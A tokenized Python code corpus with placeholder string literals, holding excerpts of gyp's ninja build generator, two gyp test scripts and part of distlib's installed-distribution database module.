rule ( <EOL> '<STR_LIT>' , <EOL> description = '<STR_LIT>' , <EOL> command = '<STR_LIT>' ) <EOL> mtime_preserving_solink_base = ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> % { '<STR_LIT>' : <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' : <EOL> ( '<STR_LIT>' <EOL> '<STR_LIT>' ) } ) <EOL> master_ninja . rule ( <EOL> '<STR_LIT>' , <EOL> description = '<STR_LIT>' , <EOL> restat = True , <EOL> command = mtime_preserving_solink_base % { '<STR_LIT>' : '<STR_LIT>' } , <EOL> rspfile = '<STR_LIT>' , <EOL> rspfile_content = <EOL> '<STR_LIT>' , <EOL> pool = '<STR_LIT>' ) <EOL> master_ninja . rule ( <EOL> '<STR_LIT>' , <EOL> description = '<STR_LIT>' , <EOL> restat = True , <EOL> command = mtime_preserving_solink_base % { '<STR_LIT>' : '<STR_LIT>' } , <EOL> rspfile = '<STR_LIT>' , <EOL> rspfile_content = '<STR_LIT>' , <EOL> pool = '<STR_LIT>' ) <EOL> master_ninja . rule ( <EOL> '<STR_LIT>' , <EOL> description = '<STR_LIT>' , <EOL> command = ( '<STR_LIT>' <EOL> '<STR_LIT>' ) , <EOL> pool = '<STR_LIT>' ) <EOL> elif flavor == '<STR_LIT>' : <EOL> master_ninja . rule ( <EOL> '<STR_LIT>' , <EOL> description = '<STR_LIT>' , <EOL> command = ( '<STR_LIT>' <EOL> '<STR_LIT>' % <EOL> sys . executable ) , <EOL> rspfile = '<STR_LIT>' , <EOL> rspfile_content = '<STR_LIT>' ) <EOL> _AddWinLinkRules ( master_ninja , embed_manifest = True ) <EOL> _AddWinLinkRules ( master_ninja , embed_manifest = False ) <EOL> else : <EOL> master_ninja . rule ( <EOL> '<STR_LIT>' , <EOL> description = '<STR_LIT>' , <EOL> command = ( '<STR_LIT>' <EOL> '<STR_LIT>' ) , <EOL> depfile = '<STR_LIT>' , <EOL> deps = deps ) <EOL> master_ninja . rule ( <EOL> '<STR_LIT>' , <EOL> description = '<STR_LIT>' , <EOL> command = ( '<STR_LIT>' <EOL> '<STR_LIT>' ) , <EOL> depfile = '<STR_LIT>' , <EOL> deps = deps ) <EOL> master_ninja . 
rule ( <EOL> '<STR_LIT>' , <EOL> description = '<STR_LIT>' , <EOL> command = '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> master_ninja . rule ( <EOL> '<STR_LIT>' , <EOL> description = '<STR_LIT>' , <EOL> command = '<STR_LIT>' ) <EOL> master_ninja . rule ( <EOL> '<STR_LIT>' , <EOL> description = '<STR_LIT>' , <EOL> command = ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> % { '<STR_LIT>' : <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' } ) ) <EOL> solink_base = '<STR_LIT>' <EOL> mtime_preserving_solink_base = ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> % { '<STR_LIT>' : solink_base , <EOL> '<STR_LIT>' : <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' } ) <EOL> solink_suffix = '<STR_LIT>' <EOL> master_ninja . rule ( <EOL> '<STR_LIT>' , <EOL> description = '<STR_LIT>' , <EOL> restat = True , <EOL> command = mtime_preserving_solink_base % { '<STR_LIT>' : solink_suffix , <EOL> '<STR_LIT:type>' : '<STR_LIT>' } , <EOL> rspfile = '<STR_LIT>' , <EOL> rspfile_content = '<STR_LIT>' , <EOL> pool = '<STR_LIT>' ) <EOL> master_ninja . rule ( <EOL> '<STR_LIT>' , <EOL> description = '<STR_LIT>' , <EOL> restat = True , <EOL> command = solink_base % { '<STR_LIT>' : solink_suffix , '<STR_LIT:type>' : '<STR_LIT>' } , <EOL> rspfile = '<STR_LIT>' , <EOL> rspfile_content = '<STR_LIT>' , <EOL> pool = '<STR_LIT>' ) <EOL> master_ninja . rule ( <EOL> '<STR_LIT>' , <EOL> description = '<STR_LIT>' , <EOL> restat = True , <EOL> command = mtime_preserving_solink_base % { '<STR_LIT>' : solink_suffix , <EOL> '<STR_LIT:type>' : '<STR_LIT>' } , <EOL> rspfile = '<STR_LIT>' , <EOL> rspfile_content = '<STR_LIT>' , <EOL> pool = '<STR_LIT>' ) <EOL> master_ninja . 
rule ( <EOL> '<STR_LIT>' , <EOL> description = '<STR_LIT>' , <EOL> restat = True , <EOL> command = solink_base % { '<STR_LIT>' : solink_suffix , '<STR_LIT:type>' : '<STR_LIT>' } , <EOL> rspfile = '<STR_LIT>' , <EOL> rspfile_content = '<STR_LIT>' , <EOL> pool = '<STR_LIT>' ) <EOL> master_ninja . rule ( <EOL> '<STR_LIT>' , <EOL> description = '<STR_LIT>' , <EOL> command = ( '<STR_LIT>' <EOL> '<STR_LIT>' ) , <EOL> pool = '<STR_LIT>' ) <EOL> master_ninja . rule ( <EOL> '<STR_LIT>' , <EOL> description = '<STR_LIT>' , <EOL> command = ( '<STR_LIT>' <EOL> '<STR_LIT>' ) ) <EOL> master_ninja . rule ( <EOL> '<STR_LIT>' , <EOL> description = '<STR_LIT>' , <EOL> command = '<STR_LIT>' ) <EOL> master_ninja . rule ( <EOL> '<STR_LIT>' , <EOL> description = '<STR_LIT>' , <EOL> command = '<STR_LIT>' ) <EOL> master_ninja . rule ( <EOL> '<STR_LIT>' , <EOL> description = '<STR_LIT>' , <EOL> command = '<STR_LIT>' ) <EOL> master_ninja . rule ( <EOL> '<STR_LIT>' , <EOL> description = '<STR_LIT>' , <EOL> command = '<STR_LIT>' ) <EOL> master_ninja . rule ( <EOL> '<STR_LIT>' , <EOL> description = '<STR_LIT>' , <EOL> command = '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> if flavor == '<STR_LIT>' : <EOL> master_ninja . rule ( <EOL> '<STR_LIT>' , <EOL> description = '<STR_LIT>' , <EOL> command = '<STR_LIT>' % sys . executable ) <EOL> master_ninja . rule ( <EOL> '<STR_LIT>' , <EOL> description = '<STR_LIT>' , <EOL> command = '<STR_LIT>' % sys . executable ) <EOL> else : <EOL> master_ninja . rule ( <EOL> '<STR_LIT>' , <EOL> description = '<STR_LIT>' , <EOL> command = '<STR_LIT>' ) <EOL> master_ninja . rule ( <EOL> '<STR_LIT>' , <EOL> description = '<STR_LIT>' , <EOL> command = '<STR_LIT>' ) <EOL> master_ninja . newline ( ) <EOL> all_targets = set ( ) <EOL> for build_file in params [ '<STR_LIT>' ] : <EOL> for target in gyp . common . AllTargets ( target_list , <EOL> target_dicts , <EOL> os . path . normpath ( build_file ) ) : <EOL> all_targets . 
add ( target ) <EOL> all_outputs = set ( ) <EOL> target_outputs = { } <EOL> target_short_names = { } <EOL> empty_target_names = set ( ) <EOL> non_empty_target_names = set ( ) <EOL> for qualified_target in target_list : <EOL> build_file , name , toolset = gyp . common . ParseQualifiedTarget ( qualified_target ) <EOL> this_make_global_settings = data [ build_file ] . get ( '<STR_LIT>' , [ ] ) <EOL> assert make_global_settings == this_make_global_settings , ( <EOL> "<STR_LIT>" % <EOL> ( this_make_global_settings , make_global_settings ) ) <EOL> spec = target_dicts [ qualified_target ] <EOL> if flavor == '<STR_LIT>' : <EOL> gyp . xcode_emulation . MergeGlobalXcodeSettingsToSpec ( data [ build_file ] , spec ) <EOL> build_file = gyp . common . RelativePath ( build_file , options . toplevel_dir ) <EOL> qualified_target_for_hash = gyp . common . QualifiedTarget ( build_file , name , <EOL> toolset ) <EOL> hash_for_rules = hashlib . md5 ( qualified_target_for_hash ) . hexdigest ( ) <EOL> base_path = os . path . dirname ( build_file ) <EOL> obj = '<STR_LIT>' <EOL> if toolset != '<STR_LIT:target>' : <EOL> obj += '<STR_LIT:.>' + toolset <EOL> my_base_path = base_path . split ( os . sep ) <EOL> i = next ( i for i , x in enumerate ( my_base_path ) if x != '<STR_LIT:..>' ) <EOL> my_base_path = ( '<STR_LIT:..>' * i ) + os . sep . join ( my_base_path [ i : ] ) <EOL> output_file = os . path . join ( obj , my_base_path , name + '<STR_LIT>' ) <EOL> ninja_output = StringIO ( ) <EOL> writer = NinjaWriter ( hash_for_rules , target_outputs , base_path , build_dir , <EOL> ninja_output , <EOL> toplevel_build , output_file , <EOL> flavor , toplevel_dir = options . toplevel_dir ) <EOL> target = writer . WriteSpec ( spec , config_name , generator_flags ) <EOL> if ninja_output . tell ( ) > <NUM_LIT:0> : <EOL> with OpenOutput ( os . path . join ( toplevel_build , output_file ) ) as ninja_file : <EOL> ninja_file . write ( ninja_output . getvalue ( ) ) <EOL> ninja_output . 
close ( ) <EOL> master_ninja . subninja ( output_file ) <EOL> if target : <EOL> if name != target . FinalOutput ( ) and spec [ '<STR_LIT>' ] == '<STR_LIT:target>' : <EOL> target_short_names . setdefault ( name , [ ] ) . append ( target ) <EOL> target_outputs [ qualified_target ] = target <EOL> if qualified_target in all_targets : <EOL> all_outputs . add ( target . FinalOutput ( ) ) <EOL> non_empty_target_names . add ( name ) <EOL> else : <EOL> empty_target_names . add ( name ) <EOL> if target_short_names : <EOL> master_ninja . newline ( ) <EOL> master_ninja . comment ( '<STR_LIT>' ) <EOL> for short_name in target_short_names : <EOL> master_ninja . build ( short_name , '<STR_LIT>' , [ x . FinalOutput ( ) for x in <EOL> target_short_names [ short_name ] ] ) <EOL> empty_target_names = empty_target_names - non_empty_target_names <EOL> if empty_target_names : <EOL> master_ninja . newline ( ) <EOL> master_ninja . comment ( '<STR_LIT>' ) <EOL> for name in sorted ( empty_target_names ) : <EOL> master_ninja . build ( name , '<STR_LIT>' ) <EOL> if all_outputs : <EOL> master_ninja . newline ( ) <EOL> master_ninja . build ( '<STR_LIT:all>' , '<STR_LIT>' , list ( all_outputs ) ) <EOL> master_ninja . default ( generator_flags . get ( '<STR_LIT>' , '<STR_LIT:all>' ) ) <EOL> master_ninja_file . close ( ) <EOL> def PerformBuild ( data , configurations , params ) : <EOL> options = params [ '<STR_LIT>' ] <EOL> for config in configurations : <EOL> builddir = os . path . join ( options . toplevel_dir , ComputeOutputDir ( params ) , <EOL> config ) <EOL> arguments = [ '<STR_LIT>' , '<STR_LIT>' , builddir ] <EOL> print ( '<STR_LIT>' % ( config , arguments ) ) <EOL> subprocess . check_call ( arguments ) <EOL> def CallGenerateOutputForConfig ( arglist ) : <EOL> signal . signal ( signal . SIGINT , signal . 
SIG_IGN ) <EOL> ( target_list , target_dicts , data , params , config_name ) = arglist <EOL> GenerateOutputForConfig ( target_list , target_dicts , data , params , config_name ) <EOL> def GenerateOutput ( target_list , target_dicts , data , params ) : <EOL> target_dicts = gyp . xcode_emulation . CloneConfigurationForDeviceAndEmulator ( <EOL> target_dicts ) <EOL> user_config = params . get ( '<STR_LIT>' , { } ) . get ( '<STR_LIT>' , None ) <EOL> if gyp . common . GetFlavor ( params ) == '<STR_LIT>' : <EOL> target_list , target_dicts = MSVSUtil . ShardTargets ( target_list , target_dicts ) <EOL> target_list , target_dicts = MSVSUtil . InsertLargePdbShims ( <EOL> target_list , target_dicts , generator_default_variables ) <EOL> if user_config : <EOL> GenerateOutputForConfig ( target_list , target_dicts , data , params , <EOL> user_config ) <EOL> else : <EOL> config_names = target_dicts [ target_list [ <NUM_LIT:0> ] ] [ '<STR_LIT>' ] . keys ( ) <EOL> if params [ '<STR_LIT>' ] : <EOL> try : <EOL> pool = multiprocessing . Pool ( len ( config_names ) ) <EOL> arglists = [ ] <EOL> for config_name in config_names : <EOL> arglists . append ( <EOL> ( target_list , target_dicts , data , params , config_name ) ) <EOL> pool . map ( CallGenerateOutputForConfig , arglists ) <EOL> except KeyboardInterrupt : <EOL> pool . terminate ( ) <EOL> raise <EOL> else : <EOL> for config_name in config_names : <EOL> GenerateOutputForConfig ( target_list , target_dicts , data , params , <EOL> config_name ) </s>
<s> """<STR_LIT>""" <EOL> import TestGyp <EOL> import sys <EOL> if sys . platform == '<STR_LIT>' : <EOL> test = TestGyp . TestGyp ( formats = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> CHDIR = '<STR_LIT>' <EOL> INFO_PLIST_PATH = '<STR_LIT>' <EOL> test . set_configuration ( '<STR_LIT>' ) <EOL> test . run_gyp ( '<STR_LIT>' , chdir = CHDIR ) <EOL> test . build ( '<STR_LIT>' , test . ALL , chdir = CHDIR ) <EOL> info_plist = test . built_file_path ( INFO_PLIST_PATH , chdir = CHDIR ) <EOL> test . must_exist ( info_plist ) <EOL> test . must_contain ( info_plist , '<STR_LIT>' ) <EOL> test . must_contain ( info_plist , '<STR_LIT>' ) <EOL> test . set_configuration ( '<STR_LIT>' ) <EOL> test . run_gyp ( '<STR_LIT>' , chdir = CHDIR ) <EOL> test . build ( '<STR_LIT>' , chdir = CHDIR ) <EOL> info_plist = test . built_file_path ( INFO_PLIST_PATH , chdir = CHDIR ) <EOL> test . must_exist ( info_plist ) <EOL> test . must_contain ( info_plist , '<STR_LIT>' ) <EOL> test . must_contain ( info_plist , '<STR_LIT>' ) <EOL> test . must_contain ( info_plist , '<STR_LIT>' ) <EOL> test . set_configuration ( '<STR_LIT>' ) <EOL> test . run_gyp ( '<STR_LIT>' , chdir = CHDIR ) <EOL> test . build ( '<STR_LIT>' , chdir = CHDIR ) <EOL> info_plist = test . built_file_path ( '<STR_LIT>' , <EOL> chdir = CHDIR ) <EOL> test . must_exist ( info_plist ) <EOL> test . must_contain ( info_plist , '<STR_LIT>' ) <EOL> test . must_contain ( info_plist , '<STR_LIT>' ) <EOL> test . must_contain ( info_plist , '<STR_LIT>' ) <EOL> test . pass_test ( ) </s>
<s> """<STR_LIT>""" <EOL> import imp <EOL> import os <EOL> import sys <EOL> import unittest <EOL> import TestGyp <EOL> test = TestGyp . TestGyp ( ) <EOL> sys . path . append ( os . path . join ( test . _cwd , '<STR_LIT>' ) ) <EOL> files_to_test = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] <EOL> suites = [ ] <EOL> for filename in files_to_test : <EOL> name = os . path . splitext ( os . path . split ( filename ) [ <NUM_LIT:1> ] ) [ <NUM_LIT:0> ] <EOL> full_filename = os . path . join ( test . _cwd , filename ) <EOL> module = imp . load_source ( name , full_filename ) <EOL> suites . append ( unittest . defaultTestLoader . loadTestsFromModule ( module ) ) <EOL> all_tests = unittest . TestSuite ( suites ) <EOL> result = unittest . TextTestRunner ( verbosity = <NUM_LIT:2> ) . run ( all_tests ) <EOL> if result . failures or result . errors : <EOL> test . fail_test ( ) <EOL> test . pass_test ( ) </s>
<s> """<STR_LIT>""" <EOL> from __future__ import unicode_literals <EOL> import base64 <EOL> import codecs <EOL> import contextlib <EOL> import hashlib <EOL> import logging <EOL> import os <EOL> import posixpath <EOL> import sys <EOL> import zipimport <EOL> from . import DistlibException , resources <EOL> from . compat import StringIO <EOL> from . version import get_scheme , UnsupportedVersionError <EOL> from . metadata import Metadata , METADATA_FILENAME , WHEEL_METADATA_FILENAME <EOL> from . util import ( parse_requirement , cached_property , parse_name_and_version , <EOL> read_exports , write_exports , CSVReader , CSVWriter ) <EOL> __all__ = [ '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' ] <EOL> logger = logging . getLogger ( __name__ ) <EOL> EXPORTS_FILENAME = '<STR_LIT>' <EOL> COMMANDS_FILENAME = '<STR_LIT>' <EOL> DIST_FILES = ( '<STR_LIT>' , METADATA_FILENAME , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , EXPORTS_FILENAME , '<STR_LIT>' ) <EOL> DISTINFO_EXT = '<STR_LIT>' <EOL> class _Cache ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self ) : <EOL> """<STR_LIT>""" <EOL> self . name = { } <EOL> self . path = { } <EOL> self . generated = False <EOL> def clear ( self ) : <EOL> """<STR_LIT>""" <EOL> self . name . clear ( ) <EOL> self . path . clear ( ) <EOL> self . generated = False <EOL> def add ( self , dist ) : <EOL> """<STR_LIT>""" <EOL> if dist . path not in self . path : <EOL> self . path [ dist . path ] = dist <EOL> self . name . setdefault ( dist . key , [ ] ) . append ( dist ) <EOL> class DistributionPath ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , path = None , include_egg = False ) : <EOL> """<STR_LIT>""" <EOL> if path is None : <EOL> path = sys . path <EOL> self . path = path <EOL> self . _include_dist = True <EOL> self . _include_egg = include_egg <EOL> self . _cache = _Cache ( ) <EOL> self . _cache_egg = _Cache ( ) <EOL> self . _cache_enabled = True <EOL> self . 
_scheme = get_scheme ( '<STR_LIT:default>' ) <EOL> def _get_cache_enabled ( self ) : <EOL> return self . _cache_enabled <EOL> def _set_cache_enabled ( self , value ) : <EOL> self . _cache_enabled = value <EOL> cache_enabled = property ( _get_cache_enabled , _set_cache_enabled ) <EOL> def clear_cache ( self ) : <EOL> """<STR_LIT>""" <EOL> self . _cache . clear ( ) <EOL> self . _cache_egg . clear ( ) <EOL> def _yield_distributions ( self ) : <EOL> """<STR_LIT>""" <EOL> seen = set ( ) <EOL> for path in self . path : <EOL> finder = resources . finder_for_path ( path ) <EOL> if finder is None : <EOL> continue <EOL> r = finder . find ( '<STR_LIT>' ) <EOL> if not r or not r . is_container : <EOL> continue <EOL> rset = sorted ( r . resources ) <EOL> for entry in rset : <EOL> r = finder . find ( entry ) <EOL> if not r or r . path in seen : <EOL> continue <EOL> if self . _include_dist and entry . endswith ( DISTINFO_EXT ) : <EOL> possible_filenames = [ METADATA_FILENAME , WHEEL_METADATA_FILENAME ] <EOL> for metadata_filename in possible_filenames : <EOL> metadata_path = posixpath . join ( entry , metadata_filename ) <EOL> pydist = finder . find ( metadata_path ) <EOL> if pydist : <EOL> break <EOL> else : <EOL> continue <EOL> with contextlib . closing ( pydist . as_stream ( ) ) as stream : <EOL> metadata = Metadata ( fileobj = stream , scheme = '<STR_LIT>' ) <EOL> logger . debug ( '<STR_LIT>' , r . path ) <EOL> seen . add ( r . path ) <EOL> yield new_dist_class ( r . path , metadata = metadata , <EOL> env = self ) <EOL> elif self . _include_egg and entry . endswith ( ( '<STR_LIT>' , <EOL> '<STR_LIT>' ) ) : <EOL> logger . debug ( '<STR_LIT>' , r . path ) <EOL> seen . add ( r . path ) <EOL> yield old_dist_class ( r . path , self ) <EOL> def _generate_cache ( self ) : <EOL> """<STR_LIT>""" <EOL> gen_dist = not self . _cache . generated <EOL> gen_egg = self . _include_egg and not self . _cache_egg . generated <EOL> if gen_dist or gen_egg : <EOL> for dist in self . 
_yield_distributions ( ) : <EOL> if isinstance ( dist , InstalledDistribution ) : <EOL> self . _cache . add ( dist ) <EOL> else : <EOL> self . _cache_egg . add ( dist ) <EOL> if gen_dist : <EOL> self . _cache . generated = True <EOL> if gen_egg : <EOL> self . _cache_egg . generated = True <EOL> @ classmethod <EOL> def distinfo_dirname ( cls , name , version ) : <EOL> """<STR_LIT>""" <EOL> name = name . replace ( '<STR_LIT:->' , '<STR_LIT:_>' ) <EOL> return '<STR_LIT:->' . join ( [ name , version ] ) + DISTINFO_EXT <EOL> def get_distributions ( self ) : <EOL> """<STR_LIT>""" <EOL> if not self . _cache_enabled : <EOL> for dist in self . _yield_distributions ( ) : <EOL> yield dist <EOL> else : <EOL> self . _generate_cache ( ) <EOL> for dist in self . _cache . path . values ( ) : <EOL> yield dist <EOL> if self . _include_egg : <EOL> for dist in self . _cache_egg . path . values ( ) : <EOL> yield dist <EOL> def get_distribution ( self , name ) : <EOL> """<STR_LIT>""" <EOL> result = None <EOL> name = name . lower ( ) <EOL> if not self . _cache_enabled : <EOL> for dist in self . _yield_distributions ( ) : <EOL> if dist . key == name : <EOL> result = dist <EOL> break <EOL> else : <EOL> self . _generate_cache ( ) <EOL> if name in self . _cache . name : <EOL> result = self . _cache . name [ name ] [ <NUM_LIT:0> ] <EOL> elif self . _include_egg and name in self . _cache_egg . name : <EOL> result = self . _cache_egg . name [ name ] [ <NUM_LIT:0> ] <EOL> return result <EOL> def provides_distribution ( self , name , version = None ) : <EOL> """<STR_LIT>""" <EOL> matcher = None <EOL> if not version is None : <EOL> try : <EOL> matcher = self . _scheme . matcher ( '<STR_LIT>' % ( name , version ) ) <EOL> except ValueError : <EOL> raise DistlibException ( '<STR_LIT>' % <EOL> ( name , version ) ) <EOL> for dist in self . get_distributions ( ) : <EOL> provided = dist . 
provides <EOL> for p in provided : <EOL> p_name , p_ver = parse_name_and_version ( p ) <EOL> if matcher is None : <EOL> if p_name == name : <EOL> yield dist <EOL> break <EOL> else : <EOL> if p_name == name and matcher . match ( p_ver ) : <EOL> yield dist <EOL> break <EOL> def get_file_path ( self , name , relative_path ) : <EOL> """<STR_LIT>""" <EOL> dist = self . get_distribution ( name ) <EOL> if dist is None : <EOL> raise LookupError ( '<STR_LIT>' % name ) <EOL> return dist . get_resource_path ( relative_path ) <EOL> def get_exported_entries ( self , category , name = None ) : <EOL> """<STR_LIT>""" <EOL> for dist in self . get_distributions ( ) : <EOL> r = dist . exports <EOL> if category in r : <EOL> d = r [ category ] <EOL> if name is not None : <EOL> if name in d : <EOL> yield d [ name ] <EOL> else : <EOL> for v in d . values ( ) : <EOL> yield v <EOL> class Distribution ( object ) : <EOL> """<STR_LIT>""" <EOL> build_time_dependency = False <EOL> """<STR_LIT>""" <EOL> requested = False <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , metadata ) : <EOL> """<STR_LIT>""" <EOL> self . metadata = metadata <EOL> self . name = metadata . name <EOL> self . key = self . name . lower ( ) <EOL> self . version = metadata . version <EOL> self . locator = None <EOL> self . digest = None <EOL> self . extras = None <EOL> self . context = None <EOL> self . download_urls = set ( ) <EOL> self . digests = { } <EOL> @ property <EOL> def source_url ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . metadata . source_url <EOL> download_url = source_url <EOL> @ property <EOL> def name_and_version ( self ) : <EOL> """<STR_LIT>""" <EOL> return '<STR_LIT>' % ( self . name , self . version ) <EOL> @ property <EOL> def provides ( self ) : <EOL> """<STR_LIT>""" <EOL> plist = self . metadata . provides <EOL> s = '<STR_LIT>' % ( self . name , self . version ) <EOL> if s not in plist : <EOL> plist . 
append ( s ) <EOL> return plist <EOL> def _get_requirements ( self , req_attr ) : <EOL> md = self . metadata <EOL> logger . debug ( '<STR_LIT>' , md . todict ( ) ) <EOL> reqts = getattr ( md , req_attr ) <EOL> return set ( md . get_requirements ( reqts , extras = self . extras , <EOL> env = self . context ) ) <EOL> @ property <EOL> def run_requires ( self ) : <EOL> return self . _get_requirements ( '<STR_LIT>' ) <EOL> @ property <EOL> def meta_requires ( self ) : <EOL> return self . _get_requirements ( '<STR_LIT>' ) <EOL> @ property <EOL> def build_requires ( self ) : <EOL> return self . _get_requirements ( '<STR_LIT>' ) <EOL> @ property <EOL> def test_requires ( self ) : <EOL> return self . _get_requirements ( '<STR_LIT>' ) <EOL> @ property <EOL> def dev_requires ( self ) : <EOL> return self . _get_requirements ( '<STR_LIT>' ) <EOL> def matches_requirement ( self , req ) : <EOL> """<STR_LIT>""" <EOL> r = parse_requirement ( req ) <EOL> scheme = get_scheme ( self . metadata . scheme ) <EOL> try : <EOL> matcher = scheme . matcher ( r . requirement ) <EOL> except UnsupportedVersionError : <EOL> logger . warning ( '<STR_LIT>' , <EOL> req ) <EOL> name = req . split ( ) [ <NUM_LIT:0> ] <EOL> matcher = scheme . matcher ( name ) <EOL> name = matcher . key <EOL> result = False <EOL> for p in self . provides : <EOL> p_name , p_ver = parse_name_and_version ( p ) <EOL> if p_name != name : <EOL> continue <EOL> try : <EOL> result = matcher . match ( p_ver ) <EOL> break <EOL> except UnsupportedVersionError : <EOL> pass <EOL> return result <EOL> def __repr__ ( self ) : <EOL> """<STR_LIT>""" <EOL> if self . source_url : <EOL> suffix = '<STR_LIT>' % self . source_url <EOL> else : <EOL> suffix = '<STR_LIT>' <EOL> return '<STR_LIT>' % ( self . name , self . version , suffix ) <EOL> def __eq__ ( self , other ) : <EOL> """<STR_LIT>""" <EOL> if type ( other ) is not type ( self ) : <EOL> result = False <EOL> else : <EOL> result = ( self . name == other . name and <EOL> self . 
version == other . version and <EOL> self . source_url == other . source_url ) <EOL> return result <EOL> def __hash__ ( self ) : <EOL> """<STR_LIT>""" <EOL> return hash ( self . name ) + hash ( self . version ) + hash ( self . source_url ) <EOL> class BaseInstalledDistribution ( Distribution ) : <EOL> """<STR_LIT>""" <EOL> hasher = None <EOL> def __init__ ( self , metadata , path , env = None ) : <EOL> """<STR_LIT>""" <EOL> super ( BaseInstalledDistribution , self ) . __init__ ( metadata ) <EOL> self . path = path <EOL> self . dist_path = env <EOL> def get_hash ( self , data , hasher = None ) : <EOL> """<STR_LIT>""" <EOL> if hasher is None : <EOL> hasher = self . hasher <EOL> if hasher is None : <EOL> hasher = hashlib . md5 <EOL> prefix = '<STR_LIT>' <EOL> else : <EOL> hasher = getattr ( hashlib , hasher ) <EOL> prefix = '<STR_LIT>' % self . hasher <EOL> digest = hasher ( data ) . digest ( ) <EOL> digest = base64 . urlsafe_b64encode ( digest ) . rstrip ( b'<STR_LIT:=>' ) . decode ( '<STR_LIT:ascii>' ) <EOL> return '<STR_LIT>' % ( prefix , digest ) <EOL> class InstalledDistribution ( BaseInstalledDistribution ) : <EOL> """<STR_LIT>""" <EOL> hasher = '<STR_LIT>' <EOL> def __init__ ( self , path , metadata = None , env = None ) : <EOL> self . finder = finder = resources . finder_for_path ( path ) <EOL> if finder is None : <EOL> import pdb ; pdb . set_trace ( ) <EOL> if env and env . _cache_enabled and path in env . _cache . path : <EOL> metadata = env . _cache . path [ path ] . metadata <EOL> elif metadata is None : <EOL> r = finder . find ( METADATA_FILENAME ) <EOL> if r is None : <EOL> r = finder . find ( WHEEL_METADATA_FILENAME ) <EOL> if r is None : <EOL> r = finder . find ( '<STR_LIT>' ) <EOL> if r is None : <EOL> raise ValueError ( '<STR_LIT>' % ( METADATA_FILENAME , <EOL> path ) ) <EOL> with contextlib . closing ( r . as_stream ( ) ) as stream : <EOL> metadata = Metadata ( fileobj = stream , scheme = '<STR_LIT>' ) <EOL> super ( InstalledDistribution , self ) . 
__init__ ( metadata , path , env ) <EOL> if env and env . _cache_enabled : <EOL> env . _cache . add ( self ) <EOL> try : <EOL> r = finder . find ( '<STR_LIT>' ) <EOL> except AttributeError : <EOL> import pdb ; pdb . set_trace ( ) <EOL> self . requested = r is not None <EOL> def __repr__ ( self ) : <EOL> return '<STR_LIT>' % ( <EOL> self . name , self . version , self . path ) <EOL> def __str__ ( self ) : <EOL> return "<STR_LIT>" % ( self . name , self . version ) <EOL> def _get_records ( self ) : <EOL> """<STR_LIT>""" <EOL> results = [ ] <EOL> r = self . get_distinfo_resource ( '<STR_LIT>' ) <EOL> with contextlib . closing ( r . as_stream ( ) ) as stream : <EOL> with CSVReader ( stream = stream ) as record_reader : <EOL> for row in record_reader : <EOL> missing = [ None for i in range ( len ( row ) , <NUM_LIT:3> ) ] <EOL> path , checksum , size = row + missing <EOL> results . append ( ( path , checksum , size ) ) <EOL> return results <EOL> @ cached_property <EOL> def exports ( self ) : <EOL> """<STR_LIT>""" <EOL> result = { } <EOL> r = self . get_distinfo_resource ( EXPORTS_FILENAME ) <EOL> if r : <EOL> result = self . read_exports ( ) <EOL> return result <EOL> def read_exports ( self ) : <EOL> """<STR_LIT>""" <EOL> result = { } <EOL> r = self . get_distinfo_resource ( EXPORTS_FILENAME ) <EOL> if r : <EOL> with contextlib . closing ( r . as_stream ( ) ) as stream : <EOL> result = read_exports ( stream ) <EOL> return result <EOL> def write_exports ( self , exports ) : <EOL> """<STR_LIT>""" <EOL> rf = self . get_distinfo_file ( EXPORTS_FILENAME ) <EOL> with open ( rf , '<STR_LIT:w>' ) as f : <EOL> write_exports ( exports , f ) <EOL> def get_resource_path ( self , relative_path ) : <EOL> """<STR_LIT>""" <EOL> r = self . get_distinfo_resource ( '<STR_LIT>' ) <EOL> with contextlib . closing ( r . 
as_stream ( ) ) as stream : <EOL> with CSVReader ( stream = stream ) as resources_reader : <EOL> for relative , destination in resources_reader : <EOL> if relative == relative_path : <EOL> return destination <EOL> raise KeyError ( '<STR_LIT>' <EOL> '<STR_LIT>' % relative_path ) <EOL> def list_installed_files ( self ) : <EOL> """<STR_LIT>""" <EOL> for result in self . _get_records ( ) : <EOL> yield result <EOL> def write_installed_files ( self , paths , prefix , dry_run = False ) : <EOL> """<STR_LIT>""" <EOL> prefix = os . path . join ( prefix , '<STR_LIT>' ) <EOL> base = os . path . dirname ( self . path ) <EOL> base_under_prefix = base . startswith ( prefix ) <EOL> base = os . path . join ( base , '<STR_LIT>' ) <EOL> record_path = self . get_distinfo_file ( '<STR_LIT>' ) <EOL> logger . info ( '<STR_LIT>' , record_path ) <EOL> if dry_run : <EOL> return None <EOL> with CSVWriter ( record_path ) as writer : <EOL> for path in paths : <EOL> if os . path . isdir ( path ) or path . endswith ( ( '<STR_LIT>' , '<STR_LIT>' ) ) : <EOL> hash_value = size = '<STR_LIT>' <EOL> else : <EOL> size = '<STR_LIT>' % os . path . getsize ( path ) <EOL> with open ( path , '<STR_LIT:rb>' ) as fp : <EOL> hash_value = self . get_hash ( fp . read ( ) ) <EOL> if path . startswith ( base ) or ( base_under_prefix and <EOL> path . startswith ( prefix ) ) : <EOL> path = os 